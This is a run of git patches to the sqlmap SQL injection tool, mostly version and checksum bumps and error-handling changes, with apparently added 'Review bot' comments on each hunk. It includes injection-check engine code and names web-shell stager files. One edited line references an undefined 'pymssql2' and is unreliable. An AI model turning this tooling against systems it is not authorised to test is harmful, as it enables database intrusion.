a/txt/checksum.md5 +++ b/txt/checksum.md5 
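Review bot: The new outer `except KeyboardInterrupt: pass` covers the whole of `saveHistory`, including the `open(historyPath, "w+")` that truncates the file and the `readline.write_history_file` that refills it, so a Ctrl-C between the two leaves an empty history file with no message at all. If the goal is only to avoid a traceback on exit, a debug line in that handler keeps the loss visible, e.g. `except KeyboardInterrupt: logger.debug("history file not saved (interrupted)")`. The pre-existing bare `except: pass` around the truncation is unchanged behaviour, though it now also absorbs interrupts raised during `open`.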
@@ -49,8 +49,8 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c0109f21b79e9867dede075afad9167f lib/core/settings.py -dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py +ffe74b003e5ac912c6be33956d9245db lib/core/settings.py +a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py From 1bd8c519c333a829e99db9c140f130464c6d79d5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 30 Oct 2018 15:41:39 +0100 Subject: [PATCH 349/428] Minor just in case update --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 69c4014677d..d65cdbbfd32 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3545,7 +3545,7 @@ def _(value): return value payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ""), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string_escape"))) if regex != payload: if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check diff --git a/lib/core/settings.py b/lib/core/settings.py index 20013c7f427..ac300f10822 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.41" +VERSION = "1.2.10.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3a2d3b80eb6..bbb470c00da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -d20b9dd6097701b08153e80dc9b7eec6 lib/core/common.py +83cb02b7fbb979b8c27e7fc58c76e6f1 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ffe74b003e5ac912c6be33956d9245db lib/core/settings.py +6b82f332dca4d40708884fccaee79a7f lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 73d83280fe21542eaa328c7a3668dcddce53c7ba Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Nov 2018 22:24:36 +0100 Subject: [PATCH 350/428] Minor patch (bounded injection case with leftover marker) --- lib/controller/checks.py | 7 ++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 6 deletions(-) 
diff --git a/lib/controller/checks.py b/lib/controller/checks.py index d0f9a8b1018..69e03c5cd34 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -74,6 +74,7 @@ from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSkipTargetException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH from lib.core.settings import CHECK_INTERNET_ADDRESS from lib.core.settings import CHECK_INTERNET_VALUE @@ -361,7 +362,7 @@ def checkSqlInjection(place, parameter, value): # Parse test's comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None - fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) + fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None) for boundary in boundaries: injectable = False 
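Review bot: The `origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None` expression is now written out three times (here and twice in the `@@ -472` hunk below), and since `place` and `value` are the function's parameters with no reassignment in the visible lines, the copies can drift apart on the next edit. Computing it once near the top of the function, `origValue = value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None`, and passing `origValue=origValue` at the three call sites keeps one source of truth. `checkSqlInjection` starts outside both hunks.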
@@ -472,13 +473,13 @@ def checkSqlInjection(place, parameter, value): # payload was successful # Parse test's for method, check in test.response.items(): - check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) + check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None) # In case of boolean-based blind SQL injection if method == PAYLOAD.METHOD.COMPARISON: # Generate payload used for comparison def genCmpPayload(): - sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) + sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None) # Forge response payload by prepending with # boundary's prefix and appending the boundary's diff --git a/lib/core/settings.py b/lib/core/settings.py index ac300f10822..286aee12821 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.42" +VERSION = "1.2.11.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bbb470c00da..eaa95a64e2e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -23,7 +23,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -fab20cff41611d4fcb4e426e2c7704da lib/controller/checks.py +71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6b82f332dca4d40708884fccaee79a7f lib/core/settings.py +9aa489d9226056b672d83786f2c606c9 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 1d6832a84aff4c787e2998b36fb3b5f3cdf6c5a6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Nov 2018 22:41:33 +0100 Subject: [PATCH 351/428] Cosmetic update (not patch) related to the #3354 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d65cdbbfd32..e2421394860 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -645,7 +645,7 @@ def walk(head, current=None): current[key] = "%s%s" % (getUnicode(value).lower(), BOUNDED_INJECTION_MARKER) else: current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER) - candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters) + candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized, separators=(',', ':') if ", " not in testableParameters[parameter] else None), parameters) current[key] = original deserialized = json.loads(testableParameters[parameter]) diff --git a/lib/core/settings.py b/lib/core/settings.py index 286aee12821..becbce944de 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.0" +VERSION = "1.2.11.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index eaa95a64e2e..bd5bf0be6d5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -83cb02b7fbb979b8c27e7fc58c76e6f1 lib/core/common.py +56c793e54bcd3292a397288ba6ab5f35 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
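Review bot: The `separators=(',', ':') if ", " not in testableParameters[parameter] else None` heuristic only looks at the item separator, so a value such as `{"a": 1,"b": 2}` (no `", "` but a spaced key separator) is re-emitted as `{"a":1,"b":2}` and the substituted text still differs from the original. Since the commit describes this as cosmetic, a comment saying so would be enough: `# best-effort: keep the compact form only when the original had no ", " item separator`. `walk()` starts outside the hunk, and whether key order survives the `json.loads`/`json.dumps` round trip depends on the dict type in use, which I cannot see.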
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9aa489d9226056b672d83786f2c606c9 lib/core/settings.py +3458bf3578ed237c8bb70684288e5cbe lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From dbdfbcc42506ffe73fa718cf5f51bf13726c1ab0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Nov 2018 22:59:20 +0100 Subject: [PATCH 352/428] Adding dates to the start/end time --- lib/core/settings.py | 2 +- sqlmap.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index becbce944de..f98366e13b8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.1" +VERSION = "1.2.11.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index c6f6194d1bb..fb126c7ae6a 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -141,7 +141,7 @@ def main(): conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) - dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) + dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() 
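Review bot: `time.strftime("%X /%Y-%m-%d/")` prints local time with no timezone indicator, and `%X` itself is locale-dependent, so the start line (and the ending line in the next hunk) cannot be correlated unambiguously with server or proxy logs. An ISO-style, zone-annotated format such as `time.strftime("%Y-%m-%d %H:%M:%S %Z")` would remove the ambiguity; the same change applies to both hunks.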
@@ -357,7 +357,7 @@ def main(): kb.threadContinue = False if conf.get("showTime"): - dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) + dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd5bf0be6d5..4f7da47b721 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3458bf3578ed237c8bb70684288e5cbe lib/core/settings.py +7665ca2a2c406933422d52553d40eded lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -ad5f9980c9bdca753578292720a5afe0 sqlmap.py +fa713ca1dc1983f3cb3d90e76a05819a sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From e99e9919cdf3dd533759bfc243ef65e631ffa16d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 2 Nov 2018 15:44:44 +0100 Subject: [PATCH 353/428] Update related to the #3356 --- lib/core/common.py | 2 ++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index e2421394860..d762b531fc3 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -1407,6 +1407,8 @@ def parseTargetDirect(): __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: __import__("kinterbasdb") + except (SqlmapSyntaxException, SqlmapMissingDependence): + raise except: if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__: pass diff --git a/lib/core/settings.py b/lib/core/settings.py index f98366e13b8..8e7f92ae121 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.2" +VERSION = "1.2.11.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4f7da47b721..2efd9ac6307 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -56c793e54bcd3292a397288ba6ab5f35 lib/core/common.py +b2a70451b0e5abe914aff2130015664f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7665ca2a2c406933422d52553d40eded lib/core/settings.py +8f0fae6a47aed35b82f320edfec67ce2 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py 
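Review bot: The added `except (SqlmapSyntaxException, SqlmapMissingDependence): raise` narrows what falls through, but the bare `except:` that follows still catches `KeyboardInterrupt`, `SystemExit` and any `SyntaxError` raised while importing a broken driver module, and reports all of them as a missing third-party library. Since the visible part of the `try` body only performs `__import__` calls, `except ImportError:` (or at least `except Exception:`) would state the intent and let interrupts propagate. The `try` statement begins outside the hunk, so its earlier branches should be checked for the same assumption.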
From 90e381a5a5388251fbb10abbddb783606f06a893 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 2 Nov 2018 16:18:08 +0100 Subject: [PATCH 354/428] Another update related to the #3356 --- lib/controller/handler.py | 36 ++++++++++++++++++--------- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- lib/utils/hashdb.py | 4 +-- plugins/dbms/mssqlserver/connector.py | 2 +- txt/checksum.md5 | 10 ++++---- 6 files changed, 34 insertions(+), 22 deletions(-) diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 9dab40488e6..bb05e11024b 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -10,6 +10,7 @@ from lib.core.data import kb from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS +from lib.core.exception import SqlmapConnectionException from lib.core.settings import MSSQL_ALIASES from lib.core.settings import MYSQL_ALIASES from lib.core.settings import ORACLE_ALIASES @@ -94,21 +95,32 @@ def setHandler(): conf.dbmsConnector = Connector() if conf.direct: + exception = None dialect = DBMS_DICT[dbms][3] if dialect: - sqlalchemy = SQLAlchemy(dialect=dialect) - sqlalchemy.connect() - - if sqlalchemy.connector: - conf.dbmsConnector = sqlalchemy - else: - try: - conf.dbmsConnector.connect() - except NameError: - pass - else: - conf.dbmsConnector.connect() + try: + sqlalchemy = SQLAlchemy(dialect=dialect) + sqlalchemy.connect() + + if sqlalchemy.connector: + conf.dbmsConnector = sqlalchemy + except Exception, ex: + exception = ex + + if not dialect or exception: + try: + conf.dbmsConnector.connect() + except Exception, ex: + if exception: + raise exception + else: + if not isinstance(ex, NameError): + raise + else: + msg = "support for direct connection to '%s' is not available. " % dbms + msg += "Please rerun with '--dependencies'" + raise SqlmapConnectionException(msg) if conf.forceDbms == dbms or handler.checkDbms(): if kb.resolutionDbms: 
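Review bot: The fallback condition `if not dialect or exception:` drops a case the old code handled: when `sqlalchemy.connect()` returns without raising but leaves `sqlalchemy.connector` unset, no exception is recorded, `conf.dbmsConnector` stays the bare `Connector()` and its `connect()` is never called. Extending the guard to `if not dialect or exception or not sqlalchemy.connector:` restores the fallback (presumably `connect()` can end that way, since the old `if sqlalchemy.connector` branch existed for it). In the fallback `except`, `raise exception` re-raises the first failure without its original traceback and silently discards the second one; logging `ex` before re-raising, or keeping the first failure's `sys.exc_info()` triple and raising that, would preserve both diagnostics. `setHandler` continues outside the hunk.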
diff --git a/lib/core/common.py b/lib/core/common.py index d762b531fc3..8da52c896d9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1410,7 +1410,7 @@ def parseTargetDirect(): except (SqlmapSyntaxException, SqlmapMissingDependence): raise except: - if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__: + if _sqlalchemy and data[3] and any(_ in _sqlalchemy.dialects.__all__ for _ in (data[3], data[3].split('+')[0])): pass else: errMsg = "sqlmap requires '%s' third-party library " % data[1] diff --git a/lib/core/settings.py b/lib/core/settings.py index 8e7f92ae121..c2d56b5bef9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.3" +VERSION = "1.2.11.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 95ce6bbce5d..b3f77358b8b 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -91,7 +91,7 @@ def retrieve(self, key, unserialize=False): raise except sqlite3.DatabaseError, ex: errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) - errMsg += "If the problem persists please rerun with `--flush-session`" + errMsg += "If the problem persists please rerun with '--flush-session'" raise SqlmapConnectionException(errMsg) else: break @@ -104,7 +104,7 @@ def retrieve(self, key, unserialize=False): except: retVal = None warnMsg = "error occurred while unserializing value for session key '%s'. " % key - warnMsg += "If the problem persists please rerun with `--flush-session`" + warnMsg += "If the problem persists please rerun with '--flush-session'" logger.warn(warnMsg) return retVal 
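Review bot: The generator in the new condition binds `_` as a real loop variable (`for _ in (data[3], data[3].split('+')[0])`), which reads as a discarded value and shadows the gettext-style `_` convention; a named variable and a hoisted lookup make the intent clearer: `dialects = _sqlalchemy.dialects.__all__` followed by `any(name in dialects for name in (data[3], data[3].split('+')[0]))`. The `if ...: pass` / `else:` shape could also be inverted to `if not (...)` so the error branch is the only body. The enclosing `try` begins outside the hunk.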
diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 997a69cd040..a39d05d9366 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -41,7 +41,7 @@ def connect(self): try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.Error, _mssql.MssqlDatabaseException), msg: + except (pymssql2.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) except ValueError: raise SqlmapConnectionException diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2efd9ac6307..a49ee603570 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -25,11 +25,11 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py -97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py +ba2717a410b21285d781ab42c4a797d0 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -b2a70451b0e5abe914aff2130015664f lib/core/common.py +eb4e54c194d50d9dc8caa1a3ea69cba6 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
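Review bot: `pymssql2.Error` in the changed `except` clause does not match the `pymssql.connect(...)` call two lines above, and no `pymssql2` name appears anywhere in the hunk; Python evaluates the exception tuple only when an exception is in flight, so if `pymssql2` is unbound a genuine connection failure surfaces as a `NameError` instead of `SqlmapConnectionException`. Unless `pymssql2` is a deliberate alias defined elsewhere in the module, the line should read `except (pymssql.Error, _mssql.MssqlDatabaseException), msg:`. `connect` starts outside the hunk.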
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-8f0fae6a47aed35b82f320edfec67ce2 lib/core/settings.py
+46698dfe7954891919d27a2f250d8f42 lib/core/settings.py
 a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 721198b5be72c8015a02acb116532a1f lib/core/target.py
@@ -107,7 +107,7 @@ f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py
 f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py
 f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py
 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py
-062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py
+1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py
 d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py
 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py
 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py
@@ -169,7 +169,7 @@ ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py
 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py
 e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py
 bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py
-decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py
+5e1c7e578d07f3670bba5d88d856715d plugins/dbms/mssqlserver/connector.py
 f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py
 65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py
 6cf74341fc84588205e02b70b2f0f5b6 plugins/dbms/mssqlserver/fingerprint.py
From e6535d359dfaedf241df0e6bcf1115774b305e7e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 4 Nov 2018 14:17:53 +0100 Subject: [PATCH 355/428] Update related to the #3358 --- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py index c2d56b5bef9..a56c74ce66c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.4" +VERSION = "1.2.11.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 762b461cf70..53cf065bdcc 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -591,7 +591,7 @@ class _(dict): threadData.lastHTTPError = (threadData.lastRequestUID, code, status) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), 